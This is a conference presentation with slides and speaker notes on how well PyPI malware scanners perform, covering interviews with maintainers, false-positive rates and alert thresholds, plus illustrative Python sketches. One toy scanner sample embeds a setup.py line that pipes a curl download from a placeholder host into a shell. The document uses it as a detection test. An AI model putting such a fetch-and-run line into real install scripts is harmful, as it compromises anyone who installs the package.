Bad Snakes: Understanding and Improving Python Package Index Malware Scanning
D.L. Vu (1,2), Zachary Newman (1), John Speed Meyers (1)
(1) Chainguard, USA; (2) FPT University, Vietnam
lyvd@fe.edu.vn, zjn@chainguard.dev, jsmeyers@chainguard.dev
5/18/2023
Problem Statement
● A growing number of malicious packages are appearing on open source package repositories, especially PyPI.
● Academic and commercial tools that can detect malicious open source software packages start to sound like a magic wand that could make these problems disappear.
● But are these tools really the cure for malicious packages?
Our study
• We spoke to administrators of and contributors to PyPI, the main repository for Python packages, along with an academic researcher who works on this problem.
• We conducted an empirical study of malware detection tools to see how they measure up to the requirements of real package repositories.
Takeaways
• These tools aren’t suitable to run on open source software repositories
automatically, in large part because they’re too noisy.
• External researchers can (and do) run their own tools in their own environments
and send reports to get malware removed.
• This often works out better for everybody involved.
• There are promising directions for improving these scanners, and other, even
more promising techniques for improving software repository security that
administrators are working toward right now.
Interviews
• We checked in with members of the PyPI community and supply-chain security
researchers to see what it would take to deploy malware detection techniques on
package repositories.
• PyPI deployed an experimental “malware checks” system in 2020, so our interviewees (a PyPI administrator and a developer of the malware check system) have direct experience running malware detection for a real repository. However, these checks are no longer in use.
• We sought to find out why not, and what it would take to deploy such a system again.
False positive rates matter more than false negative rates
• Many researchers build systems designed to catch all or most malware: after all, we don’t want to let bad packages through.
• They accept a low false positive rate as the price of catching bad actors.
• However, given the number of legitimate packages published, even seemingly low rates (like 5%) would require administrators to manually inspect thousands of packages each week.
• An automated tool needs an “effectively zero” false positive rate.
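The scale argument is simple arithmetic. The sketch below computes the weekly manual-review load and the share of alerts that point at real malware (precision). The upload volume, malware count, and detection rate in the example are hypothetical round numbers chosen for illustration, not PyPI statistics or results from this study.

```python
def weekly_review_load(benign_uploads: int, false_positive_rate: float) -> float:
    """Expected number of benign packages flagged for manual review per week."""
    return benign_uploads * false_positive_rate


def alert_precision(malicious: int, benign: int, tpr: float, fpr: float) -> float:
    """Fraction of alerts that point at real malware (positive predictive value)."""
    true_alerts = malicious * tpr
    false_alerts = benign * fpr
    return true_alerts / (true_alerts + false_alerts)


# Hypothetical week: 50,000 benign uploads and 10 malicious ones,
# scanned by a tool that catches 90% of malware at a 5% false positive rate.
print(weekly_review_load(50_000, 0.05))         # about 2,500 packages to inspect by hand
print(alert_precision(10, 50_000, 0.90, 0.05))  # well under 1% of alerts are real malware
```

Because malware is rare relative to legitimate uploads, false alarms swamp true detections unless the false positive rate is driven close to zero.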
Repository administrators must balance multiple security priorities
• PyPI and similar repositories must weigh automated malware detection against other priorities such as software signing and multi-factor authentication.
• Because most malware packages affect few or no actual users, PyPI administrators have decided to spend their finite resources on higher-impact projects.
Just because PyPI isn’t running these checks doesn’t mean that others aren’t.
• Security researchers develop and operate Python malware detection systems using their own time and computing resources, and report malicious packages to PyPI when they find them.
• PyPI maintainers benefit from high-quality, low-noise malware reports, and the security researchers benefit from positive coverage of their companies, products, and services.
Benchmarking Different Malware Detection Approaches
• To understand whether existing systems were appropriate for this setting, we ran experiments comparing different Python malware detection approaches.
• These approaches include static analysis tools that analyze source code, dynamic analysis tools that observe running software, and metadata analysis tools that look at attributes such as package names.
• We found three Python malware detection tools that met our criteria: Bandit4Mal, OSSGadget OSS Detect Backdoor, and PyPI Malware Checks.
• We used a benchmark dataset of 168 malware packages (courtesy of the Backstabber's Knife Collection and MALOSS datasets), 1,430 popular packages, and 986 randomly selected packages.
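To make "static analysis" concrete, here is a toy rule-based scanner built on Python's standard `ast` module. It walks a file's syntax tree and reports calls whose names appear on a small watch list. The watch list (`SUSPICIOUS_CALLS`) and the helper names are hypothetical; this is not how Bandit4Mal, OSSGadget, or PyPI Malware Checks are implemented, only a sketch of the general technique.

```python
import ast
from typing import List, Optional, Tuple

# Hypothetical watch list: call names that these toy rules treat as suspicious.
SUSPICIOUS_CALLS = {
    "exec": "dynamic code execution",
    "eval": "dynamic code evaluation",
    "system": "shell command execution",
    "urlopen": "network access",
}


def call_name(node: ast.Call) -> Optional[str]:
    """Return the bare function name of a call, e.g. 'system' for os.system(...)."""
    if isinstance(node.func, ast.Name):
        return node.func.id
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    return None


def scan_source(source: str) -> List[Tuple[int, str]]:
    """Return sorted (line number, reason) pairs for each watched call in the source."""
    alerts = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = call_name(node)
            if name in SUSPICIOUS_CALLS:
                alerts.append((node.lineno, SUSPICIOUS_CALLS[name]))
    return sorted(alerts)


setup_py = '''
import os
from setuptools import setup
os.system("curl http://example.invalid/payload | sh")
setup(name="demo")
'''
print(scan_source(setup_py))  # [(4, 'shell command execution')]
```

Matching on names alone is cheap and easy to explain, but the same calls appear in plenty of ordinary library code, so a rule this blunt also fires on benign packages.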
How do malware detection approaches perform?
• We scanned these packages with each chosen tool, recording all alerts raised on the setup.py files (which can run malicious code at package installation time) as well as on the entire package (for malicious code that executes at runtime).
• We count an alert on a malicious package as a true positive and an alert on a benign package as a false positive.
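Under this labeling, a scanner's true and false positive rates can be computed per package. The sketch below assumes that any package with at least one alert counts as flagged (the default setting, before the threshold experiment); the `ScanResult` type and the toy results are hypothetical.

```python
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ScanResult:
    package: str
    is_malicious: bool  # ground-truth label from the benchmark dataset
    alert_count: int    # alerts the scanner raised for this package


def detection_rates(results: List[ScanResult]) -> Tuple[float, float]:
    """Return (true positive rate, false positive rate); any alert flags a package."""
    malicious = [r for r in results if r.is_malicious]
    benign = [r for r in results if not r.is_malicious]
    tpr = sum(r.alert_count > 0 for r in malicious) / len(malicious)
    fpr = sum(r.alert_count > 0 for r in benign) / len(benign)
    return tpr, fpr


# Toy results, invented for illustration.
results = [
    ScanResult("evil-a", True, 4),
    ScanResult("evil-b", True, 0),
    ScanResult("good-a", False, 0),
    ScanResult("good-b", False, 2),
    ScanResult("good-c", False, 0),
    ScanResult("good-d", False, 0),
]
print(detection_rates(results))  # (0.5, 0.25)
```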
Scanners catch the majority of malicious packages.
• All three tools had true positive rates above 50%.
• When including all Python files, the tools detected over 85% of malicious packages.
False positive rates are high (sometimes higher than true positive rates)
• The measured tools have false positive rates between 15% and 97%.
• The false positive rate increases when checking all files rather than just setup.py files, sometimes exceeding the true positive rate for malicious packages.
• This suggests that many of the tools' rules are designed to catch behavior that is suspicious in setup.py files but normal in package code.
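One way to act on this observation is to scope rules by file: keep alerts from install-time-only rules when they fire in setup.py and drop them elsewhere. The sketch below is a hypothetical post-processing filter, not something the study evaluated; the rule IDs in `INSTALL_TIME_ONLY_RULES` are invented for illustration, and real tools name their rules differently.

```python
from pathlib import PurePosixPath
from typing import List, Tuple

# Hypothetical rule IDs for behavior that is alarming at install time
# but routine in ordinary package code.
INSTALL_TIME_ONLY_RULES = {"network-call", "subprocess-call", "dynamic-exec"}


def keep_alert(rule_id: str, file_path: str) -> bool:
    """Keep install-time-only alerts only when they fire inside a setup.py file."""
    if rule_id in INSTALL_TIME_ONLY_RULES:
        return PurePosixPath(file_path).name == "setup.py"
    return True


def filter_alerts(alerts: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Filter (rule_id, file_path) alerts with keep_alert."""
    return [(rule, path) for rule, path in alerts if keep_alert(rule, path)]


alerts = [
    ("network-call", "pkg-1.0/setup.py"),
    ("network-call", "pkg-1.0/pkg/http_client.py"),
    ("subprocess-call", "pkg-1.0/pkg/build_utils.py"),
    ("hardcoded-ip", "pkg-1.0/pkg/config.py"),
]
print(filter_alerts(alerts))
```

The trade-off is recall: malware that hides its payload in runtime code, the case the whole-package scan targets, would slip past these scoped rules.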
When it rains, it pours: packages with one alert often have many more.
• The tools can raise multiple alerts per package, and they did.
• When scanning the setup.py files of benign packages, every tool produced a median of 3 or fewer alerts per package.
• When scanning all Python files, this median rises to between 10 and 85.
• The noisiest benign package had 145,799 alerts.
Making alerts stricter results in missing a lot of malware
• Rather than flagging a package as possibly malicious if it has any alerts, we tried requiring a threshold number of alerts.
• We found that as the threshold rises, the tools report very few (or even no) malicious packages before the false positive rates become manageable.
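The threshold experiment amounts to sweeping a cut-off over per-package alert counts. The toy data below is invented to mimic the pattern on these slides (benign packages that collect many alerts) and does not reproduce the study's numbers; the function names are hypothetical.

```python
from typing import Dict, List, Tuple

# (is_malicious, alert_count) per package; invented toy data.
RESULTS: List[Tuple[bool, int]] = [
    (True, 2), (True, 5),
    (False, 0), (False, 3), (False, 12), (False, 40),
]


def rates_at_threshold(results: List[Tuple[bool, int]], threshold: int) -> Tuple[float, float]:
    """(TPR, FPR) when a package is flagged only if it has >= threshold alerts."""
    malicious = [count for is_mal, count in results if is_mal]
    benign = [count for is_mal, count in results if not is_mal]
    tpr = sum(count >= threshold for count in malicious) / len(malicious)
    fpr = sum(count >= threshold for count in benign) / len(benign)
    return tpr, fpr


def sweep(results: List[Tuple[bool, int]], thresholds: List[int]) -> Dict[int, Tuple[float, float]]:
    """Map each threshold to its (TPR, FPR) pair."""
    return {t: rates_at_threshold(results, t) for t in thresholds}


for threshold, (tpr, fpr) in sweep(RESULTS, [1, 5, 20]).items():
    print(f"threshold={threshold:>2}  TPR={tpr:.2f}  FPR={fpr:.2f}")
```

In this toy case, the threshold that finally pushes the false positive rate down to 25% has already lost every malicious package.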
Some rules are better than others
• One rule checks for networking code in unexpected places; checks of this type were a good indicator of a malicious package.
• Other rules, which looked for metaprogramming or the running of external processes, were less effective at distinguishing malicious from benign code.
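Rules can be compared by measuring, for each rule, what fraction of the packages it flags are actually malicious. The sketch below assumes alerts are available as (package, rule ID) pairs; the rule IDs and package names are hypothetical.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple


def rule_precision(alerts: List[Tuple[str, str]], malicious: Set[str]) -> Dict[str, float]:
    """Per rule: share of the distinct packages it flagged that are malicious."""
    flagged: Dict[str, Set[str]] = defaultdict(set)
    for package, rule_id in alerts:
        flagged[rule_id].add(package)  # a package counts once per rule
    return {rule: len(pkgs & malicious) / len(pkgs) for rule, pkgs in flagged.items()}


alerts = [
    ("evil-a", "network-in-setup"),
    ("evil-b", "network-in-setup"),
    ("evil-a", "metaprogramming"),
    ("good-a", "metaprogramming"),
    ("good-b", "metaprogramming"),
    ("good-b", "metaprogramming"),
]
print(rule_precision(alerts, malicious={"evil-a", "evil-b"}))
```

Counting distinct packages rather than raw alerts keeps a single very noisy package from dominating a rule's score.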
The tools ran reasonably fast
• On a laptop, processing a typical package took well under 10 seconds.
• This is too slow to run before a package upload completes, but quite reasonable for passively analyzing a repository.
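A back-of-the-envelope calculation shows why per-package scan times like these suit a background job. The daily upload volume in the example is a hypothetical round number, and 10 seconds is used as a pessimistic upper bound taken from the slide; `workers_needed` is an illustrative helper.

```python
import math

SECONDS_PER_DAY = 24 * 60 * 60


def workers_needed(uploads_per_day: int, seconds_per_package: float) -> int:
    """Minimum number of parallel scanners that keep pace with a day's uploads."""
    return math.ceil(uploads_per_day * seconds_per_package / SECONDS_PER_DAY)


# Hypothetical: 10,000 uploads per day, 10 seconds per package (upper bound).
print(workers_needed(10_000, 10))  # 2
```

Throughput is cheap to add with more workers; latency is not. A couple of background scanners could keep up with this hypothetical load, whereas adding the same delay to every interactive upload would be felt by every publisher.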
Potential directions for better scanning
• Prioritize higher-impact packages: typosquatters, shrinkwrapped clones, and popular packages.
• Consider dynamic scanning techniques, such as running code in a sandbox.
• Make sure tools are easy to interpret. “6 alerts” is hard to evaluate; “makes network calls to these domains” is less so.
• Most importantly, don’t expect volunteer repository administrators to maintain and run tools for you; instead, form a relationship and plan to work together for the long haul.
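The first and third suggestions can be combined in a small metadata check: flag new package names that sit within one edit of a popular package's name, and explain each alert in words rather than as a bare count. This is an illustrative sketch, not a tool from the study; the popular-package list and the one-edit cut-off are assumptions.

```python
from typing import List


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the classic dynamic-programming table, one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            curr.append(min(
                prev[j] + 1,               # deletion
                curr[j - 1] + 1,           # insertion
                prev[j - 1] + (ca != cb),  # substitution (free if characters match)
            ))
        prev = curr
    return prev[-1]


def typosquat_findings(name: str, popular: List[str], max_distance: int = 1) -> List[str]:
    """Human-readable reasons a new package name may be imitating a popular one."""
    findings = []
    for target in popular:
        d = edit_distance(name.lower(), target.lower())
        if 0 < d <= max_distance:
            findings.append(f"name '{name}' is {d} edit(s) away from popular package '{target}'")
    return findings


print(typosquat_findings("reqests", ["requests", "numpy"]))
```

Plain Levenshtein distance counts a transposition such as "reqeusts" as two edits, so it would miss that case at this cut-off; a Damerau-Levenshtein distance would catch it.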
Conclusions
• The primary lesson from our interviews and experiments is to listen to maintainers.
• Researchers should engage with maintainers, who can outline the requirements for practical systems and who have endless ideas worth exploring.
• We remain optimistic about open-source software security. Organizations like the
OpenSSF do listen to maintainers while providing resources for academics, maintainers,
and companies to collaborate.
• As long as we listen to what the community has to say, open-source security will steadily
improve.
icse-presentation.pptx

  • 1. Bad Snakes: Understanding and Improving Python Package Index Malware Scanning D.L. Vu1,2 Zachary Newman1 John Speed Meyers1 1Chainguard, USA, 2FPT University, Vietnam 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 1 lyvd@fe.edu.vn zjn@chainguard.dev jsmeyers@chainguard.dev
  • 2. Problem Statement ● An increasing number of malware on open source package repositories, specifically PyPI. ● Academic and commercial tools that can detect malicious open source software packages starts to sound like a magic wand that could make these problems disappear. ● But, are these tools the cure to these malicious packages? 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 2
  • 3. Our study • We spoke to administrators of and contributors to PyPI, the main repository for Python packages, along with an academic researcher who works on this problem. • We conducted an empirical research of malware detection tools to see how they measured up to the requirements of real package repositories. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 3
  • 4. Takeaways • These tools aren’t suitable to run on open source software repositories automatically, in large part because they’re too noisy. • External researchers can (and do) run their own tools in their own environments and send reports to get malware removed. • This often works out better for everybody involved. • There are promising directions for improving these scanners, and other, even more promising techniques for improving software repository security that administrators are working toward right now. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 4
  • 5. Interviews • We checked in with members of the PyPI community and supply-chain security researchers to see what it would take to deploy malware detection techniques on package repositories. • PyPI deployed an experimental “malware checks” system in 2020, so our interviewees (an administrator of PyPI, and one developer of the malware check system) have direct experience with running malware detection for a real repository. However, these checks aren’t used anymore. • We sought to find out why not, and what it would take to deploy such a system again. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 5
  • 6. False positive rates matter more than false negative rates • Many researchers build systems designed to catch all or most malware: after all, we don’t want to let bad packages through. • They accept a low false-positive rate as the price to pay to catch bad actors. • However, given the number of legitimate packages published, even seemingly- low rates (like 5%) require administrators to manually inspect thousands of packages each week. • An automated tool needs to have an “effectively zero” rate. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 7
  • 7. Repository administrators must balance multiple security priorities • PyPI and similar repositories must weigh automated malware detection against software signing and multi-factor authentication. • Most malware packages affect few or no actual users, PyPI administrators have decided to use their finite resources to focus on higher impact projects. 5/18/2023 Bad Snakes: Understanding and Improving Python Package Index Malware Scanning 8
  • 8. Just because PyPI isn’t running these checks doesn’t mean that others aren’t. • Security researchers develop and operate Python malware detection systems using their own time and computing resources, providing reports to PyPI when they detect malicious packages. • PyPI maintainers benefit from high-quality, low-noise reports on malware, and the security researchers benefit from positive coverage of their company, products, and services.
  • 9. Benchmarking Different Malware Detection Approaches • To understand if existing systems were appropriate for this setting, we ran some experiments comparing different Python malware detection approaches. • These systems include static analysis tools that analyze source code, dynamic analysis tools that observe running software, and metadata analysis tools that look at things like package names. • We found three Python malware detection tools that met our criteria: Bandit4Mal, OSSGadget OSS Detect Backdoor, and PyPI Malware Checks. • We used a benchmark dataset including 168 malware packages (courtesy of the Backstabber's Knife Collection and MALOSS datasets), 1,430 popular packages, and 986 randomly selected packages.
  • 10. How do malware detection approaches perform? • We scanned these packages with each chosen tool, recording all alerts produced when scanning each package’s setup.py file (which can run malicious code at package installation time) as well as the entire package (for malicious code that executes at runtime). • We consider an alert for a malicious package a true positive and an alert for a benign package a false positive.
  • 11. Scanners catch the majority of malicious packages. • All three of these tools had true positive rates above 50% when scanning only setup.py files. • When including all Python files, the tools detected over 85% of malicious packages.
  • 12. False positive rates are high (sometimes higher than true positive rates) • The measured tools have false positive rates between 15% and 97%. • The false positive rate increases when checking all Python files rather than just setup.py files, sometimes exceeding the true positive rate for malicious packages. • This suggests that many rules used by these tools are designed to catch behavior that is suspicious in setup.py files, but normal in package code.
  • 13. When it rains, it pours: packages with one alert often have many more. • The tools can fire multiple alerts per package, and they did. • Scanning the setup.py files of benign packages, we find that all tools have a median of 3 or fewer alerts. • When scanning all Python files, the median number of alerts increases to between 10 and 85. • The noisiest benign package had 145,799 alerts.
  • 14. Making the alerts more strict results in missing a lot of malware • Rather than flagging a package as possibly malicious if it has any alerts, we tried requiring a threshold number of alerts. • We found that with a higher threshold, the tools report very few (or even no) malicious packages even before the false positive rates become manageable.
  • 15. Some rules are better than others • For example, one rule checks for networking code in unexpected places; checks of this type were a good indicator of a malicious package. • Other rules, which looked for metaprogramming or running external processes, were less effective in distinguishing malicious from benign code.
  • 16. The tools ran reasonably fast • On a test laptop, the tools processed a typical package in well under 10 seconds. • This is too slow to run before a package upload finishes but is quite reasonable to passively analyze a repository.
  • 17. Potential directions for better scanning • Prioritize higher-impact packages: typosquatters, shrinkwrapped clones, and popular packages. • Consider dynamic scanning techniques that run code in a sandbox. • Make sure tools are easy to interpret. “6 alerts” is hard to evaluate; “makes network calls to these domains,” less so. • Most importantly, don’t expect volunteer repository administrators to maintain and run tools for you; instead, form a relationship and plan to work together for the long haul.
  • 18. Conclusions • The primary lesson from our interviews and experiments is to listen to maintainers. • Researchers should engage with maintainers, who can outline requirements for practical systems, and who have endless ideas worth exploring. • We remain optimistic about open-source software security. Organizations like the OpenSSF do listen to maintainers while providing resources for academics, maintainers, and companies to collaborate. • As long as we listen to what the community has to say, open-source security will steadily improve.
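The "False positive rates matter more than false negative rates" slide can be made concrete with a back-of-the-envelope calculation. The sketch below is illustrative only: the weekly volumes (50,000 benign uploads, 20 malicious ones) and the 90% true positive rate are hypothetical placeholders, not PyPI statistics or results from the study. It shows how a seemingly low false-positive rate scales with upload volume, and how it drags down precision when malware is rare.

```python
"""Back-of-the-envelope false-alarm arithmetic for a repository malware scanner.

All volumes and rates below are hypothetical placeholders, not measured PyPI numbers.
"""


def weekly_false_alarms(benign_uploads: int, false_positive_rate: float) -> float:
    """Expected number of benign uploads flagged (and needing manual review) per week."""
    return benign_uploads * false_positive_rate


def precision(malicious_uploads: int, benign_uploads: int,
              true_positive_rate: float, false_positive_rate: float) -> float:
    """Fraction of flagged uploads that are actually malicious."""
    true_alarms = malicious_uploads * true_positive_rate
    false_alarms = weekly_false_alarms(benign_uploads, false_positive_rate)
    flagged = true_alarms + false_alarms
    return true_alarms / flagged if flagged else 0.0


if __name__ == "__main__":
    # Hypothetical week: 50,000 benign uploads and 20 malicious ones.
    BENIGN, MALICIOUS = 50_000, 20
    for fpr in (0.05, 0.01, 0.001, 0.0):
        alarms = weekly_false_alarms(BENIGN, fpr)
        p = precision(MALICIOUS, BENIGN, true_positive_rate=0.9, false_positive_rate=fpr)
        print(f"FPR={fpr:<6} false alarms/week={alarms:>7.0f} precision={p:.3f}")
```

Under these made-up volumes, a 5% false-positive rate yields 2,500 false alarms a week, and fewer than 1 in 100 flagged uploads is actually malicious (18 of 2,518). Precision only becomes usable as the rate approaches zero, which is the intuition behind the "effectively zero" requirement.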
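The benchmark scanned each package in two ways: once restricted to setup.py (code that can run at install time) and once over every Python file (code that may run when the package is used). The following is a minimal sketch of that file selection, assuming each source distribution has already been unpacked into a local directory. The function name `files_to_scan` is hypothetical and is not part of Bandit4Mal, OSSGadget, or PyPI Malware Checks.

```python
import tempfile
from pathlib import Path


def files_to_scan(package_root: Path, setup_only: bool) -> list[Path]:
    """Return the Python files to hand to a scanner for one unpacked package.

    setup_only=True  -> install-time pass: setup.py files only.
    setup_only=False -> whole-package pass: every .py file.
    """
    # rglob searches recursively, so this also finds setup.py inside the
    # top-level "name-version/" directory that sdists usually contain
    # (and any nested copies, which a real tool might want to exclude).
    pattern = "setup.py" if setup_only else "*.py"
    return sorted(p for p in package_root.rglob(pattern) if p.is_file())


if __name__ == "__main__":
    # Build a tiny fake unpacked sdist in a temporary directory.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "demo-1.0" / "demo").mkdir(parents=True)
        (root / "demo-1.0" / "setup.py").write_text("from setuptools import setup\nsetup()\n")
        (root / "demo-1.0" / "demo" / "__init__.py").write_text("")
        for mode in (True, False):
            names = [p.relative_to(root).as_posix() for p in files_to_scan(root, mode)]
            print("setup_only" if mode else "all files", names)
```

Running the same scanner over both file sets for each package produces the two sets of alerts that the setup.py-only and all-files rates are computed from.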
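The rates on the "How do malware detection approaches perform?" and "Making the alerts more strict results in missing a lot of malware" slides are per package. A package counts as flagged when its alert count reaches a threshold, which is one alert in the default "any alert" setting. The sketch below shows that bookkeeping and a threshold sweep. It assumes you already have an alert count and a ground-truth label for each package. The `ScanResult` type and the toy counts are invented for illustration and are not the study's data.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ScanResult:
    package: str
    malicious: bool  # ground-truth label from the benchmark dataset
    alerts: int      # number of alerts the scanner raised on this package


def rates_at_threshold(results: list[ScanResult], threshold: int) -> tuple[float, float]:
    """Return (true_positive_rate, false_positive_rate) when a package is
    flagged iff it has at least `threshold` alerts."""
    malicious = [r for r in results if r.malicious]
    benign = [r for r in results if not r.malicious]
    tp = sum(r.alerts >= threshold for r in malicious)
    fp = sum(r.alerts >= threshold for r in benign)
    tpr = tp / len(malicious) if malicious else 0.0
    fpr = fp / len(benign) if benign else 0.0
    return tpr, fpr


if __name__ == "__main__":
    # Invented toy data in which benign packages are noisier than malware.
    toy = [
        ScanResult("evil-a", True, 2),
        ScanResult("evil-b", True, 5),
        ScanResult("evil-c", True, 0),
        ScanResult("benign-a", False, 0),
        ScanResult("benign-b", False, 12),
        ScanResult("benign-c", False, 40),
        ScanResult("benign-d", False, 1),
    ]
    for k in (1, 3, 10, 50):
        tpr, fpr = rates_at_threshold(toy, k)
        print(f"threshold={k:>2}  TPR={tpr:.2f}  FPR={fpr:.2f}")
```

In this toy data, raising the threshold to 10 drops every malicious package while half of the benign packages are still flagged. This is the pattern the slide describes: malware detection collapses before the false positive rate becomes manageable.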

Editor's Notes

  1. Hello everyone, my name is Ly Vu. Today I am going to talk about our work titled Bad Snakes: Understanding and Improving Python Package Index Malware Scanning. This is joint work with Zack Newman and John Speed Meyers. The work has been supported by Chainguard.
  2. Let me first explain what motivates our study. There are tools out there that can detect malicious open-source software packages, and there are decades of academic research and commercial tools developed to detect malicious software. But are these tools really the cure for these malicious packages? Could they be adopted by package repositories?
  3. To find out what package repositories require of a malware detection tool, and where current malware detection tools stand, we conducted a two-part study. First, we checked in with administrators of PyPI, the main and largest repository for third-party Python packages. We then performed experiments comparing different malware detection techniques to see how they measured up to the requirements of real package repositories.
  4. We distill several key insights from our study. Current malware detection tools do not seem to be suitable to run on open-source package repositories automatically, in large part because they are too noisy, producing too many false alerts. External researchers, such as those from academia, can and do run their own tools in their own environments and send incident reports to repository maintainers to get malware removed. Both external researchers and PyPI benefit from working together. There are promising directions for improving the malware scanners, and other, even more promising techniques for improving software repository security that administrators and other researchers are working toward right now.
  5. We interviewed PyPI administrators and an academic researcher to see what it would take to deploy malware detection techniques on open-source package repositories such as PyPI. PyPI, the Python Package Index, implemented a so-called "malware checks" system in 2020, and two of our interviewees have direct experience in developing it. Unfortunately, however, these checks aren't used anymore. We sought to find out why not, and what it would take to deploy such a system again. In particular, we asked the following questions: What is the origin story of the current PyPI malware checks? What has been your experience, if any, with the current PyPI malware checks? What are the current plans, if any, for improving the PyPI malware checks? How do you judge the performance of a PyPI malware check system? How would you judge a set of proposed improvements to the PyPI malware check system?
  6. When designing a detection system, many researchers aim to catch all or most malware, and they tend to accept a low false-positive rate as the price to pay to catch bad actors. However, PyPI receives many legitimate packages every day, so even seemingly low false-positive rates would require administrators to manually inspect thousands of packages each week. Hence, an automated tool needs an "effectively zero" false-positive rate before it can be considered for integration into a package repository's security pipeline.
  7. The second insight from our interviews is that PyPI and similar package repositories must weigh automated malware detection against other security mechanisms, such as software signing and multi-factor authentication. Moreover, most malware packages affected few or no actual users; for example, many of their downloads came from mirrors or bots. PyPI administrators have therefore decided to use their limited resources to focus on higher-impact projects.
  8. External researchers, such as those from academia, develop and operate Python malware detection tools using their own time and computing resources, and they can then report malicious packages to PyPI. PyPI maintainers therefore benefit from high-quality, low-noise reports on malware. On the other side, security researchers benefit from positive coverage of their company, products, and services.
  9. To understand whether a specific system was appropriate for use in a repository's security pipeline, we ran some experiments comparing different Python malware detection approaches. These systems include static code analysis tools, dynamic analysis tools that observe the runtime behavior of a package, and metadata analysis tools that look at things like package names or package downloads. We collected malware samples from the two largest datasets, Backstabber’s Knife Collection and MALOSS. We also collected popular and randomly selected packages from PyPI.
  10. This table represents the tools we surveyed. We focused on behavior-based tools, as they can provide much more precise analysis than metadata-based tools. To be included, a tool had to have its source code available and publish its detection rules. In the end, we found three detection tools: Bandit4Mal, a custom version of Bandit designed to catch malicious code; OSSGadget, a tool developed by Microsoft that scans not only Python code but also other languages such as JavaScript; and PyPI Malware Checks, the default checks developed by PyPI.
  11. This diagram represents our experiments with the malware detection tools. Given the packages collected from PyPI and the two malware datasets, we ran the selected tools on the chosen package artifacts. We recorded the alerts generated on the whole package and on the package's setup.py file, since setup.py is often the file into which malicious code is injected. An alert is considered a true positive if a malicious package is classified as malicious; it is a false positive when a benign, legitimate package is classified as malicious.
  12. Here is what we found. The scanners catch the majority of malicious packages, which is good news. In particular, all three of the selected tools had true positive rates above 50% when considering only setup.py files. When including all Python files, the tools detected over 85% of malicious packages.
  13. However, we observed that the tools suffered from relatively high false positive rates, especially when checking all Python files. The false positive rates range between 15% and 97% across the tools, and when scanning all files, the chance of falsely classifying benign code as malicious was much higher. This suggests that the selected tools are designed to catch behavior that is suspicious in setup.py files but normal in package code.
  14. We observed that packages with one alert often have many more: when it rains, it pours. Scanning the setup.py files, which are the installation files in Python packages, we find that all tools have a median of 3 or fewer alerts. Scanning all Python files increased the median number of alerts to between 10 and 85. In our experiment, the noisiest benign package had 145,799 alerts.
  15. Rule-based tools require setting a proper threshold to balance false positive and true positive rates. In our experiment, rather than flagging a package as possibly malicious if it has any alerts, we tried requiring a threshold number of alerts. We found that with a higher threshold, the tools report very few (or even no) malicious packages even before the false positive rates become manageable.
  16. We examined the rules in PyPI Malware Checks and observed that not all rules are equally good at detecting malicious code; some rules are better than others. For example, checking for the presence of an outgoing network connection or command execution could be a good indicator of a malicious package. Other rules, which looked for metaprogramming or running external processes, were less effective in separating malicious from benign code. Improving the rules is therefore important for increasing the precision of the tools.
  17. We observed that the tools run reasonably fast. Tested on a laptop with 8 GB of RAM and a 4-core Intel CPU, processing a typical package took well under 10 seconds. This may be too slow to run before a package upload finishes, but it is quite reasonable for passively analyzing a repository. For example, you could run the tools to scan the entire repository.
  18. There are potential directions for better malware scanning that we learned from our interviews and experiments. First, prioritize higher-impact packages, such as typosquatting packages and popular packages. Typosquatting is a common malware attack, and popular packages are heavily used, which makes both important vectors for malware infection. Second, invest in dynamic scanning techniques, which run code in a sandbox, as they can provide more precise analysis and reflect the true behavior of malware. Third, make sure that the output of scanners is easy to interpret, for example by giving an insightful description for each alert: "6 alerts" is hard to evaluate, but "makes network calls to these domains" is much easier to act on. And last but not least, don't expect volunteer repository administrators to maintain and run tools for you; instead, form a relationship and plan to work together for the long haul.
  19. That brings me to the end of my presentation. Let me summarize our research in this final slide. The main message from our interviews and experiments is to listen to maintainers, who are responsible for managing security issues in package repositories. Maintainers can outline requirements for practical systems and propose endless ideas for improving them, so external researchers should actively engage with the maintainers of package repositories to evaluate their solutions and get feedback. Still, we remain optimistic about open-source software security. Organizations like the OpenSSF do listen to maintainers while providing resources for academics, maintainers, and companies to collaborate. As long as we listen to what the community has to say, we believe open-source security will improve steadily.
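The "Some rules are better than others" discussion singles out checks for networking code in unexpected places. Below is a hypothetical, much-simplified rule of that kind, written with Python's standard `ast` module. It reports imports of common networking modules in a file such as setup.py. The module watch-list is an assumption made for illustration; this is not the actual PyPI Malware Checks rule.

```python
import ast

# Hypothetical watch-list for illustration only; not the PyPI Malware Checks rule set.
NETWORK_MODULES = {"socket", "urllib", "urllib3", "http", "requests", "ftplib", "smtplib"}


def network_imports(source: str) -> list[tuple[int, str]]:
    """Return sorted (line number, module) pairs for imports of networking modules.

    Only absolute imports are considered; the check looks at the top-level
    package, so "urllib.request" matches "urllib".
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            modules = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            modules = [node.module]
        else:
            continue
        for module in modules:
            if module.split(".")[0] in NETWORK_MODULES:
                findings.append((node.lineno, module))
    return sorted(findings)


if __name__ == "__main__":
    suspicious_setup = (
        "from setuptools import setup\n"
        "import urllib.request\n"
        "urllib.request.urlopen('https://example.invalid/x')\n"
        "setup(name='demo')\n"
    )
    for lineno, module in network_imports(suspicious_setup):
        print(f"setup.py:{lineno}: imports networking module {module!r}")
```

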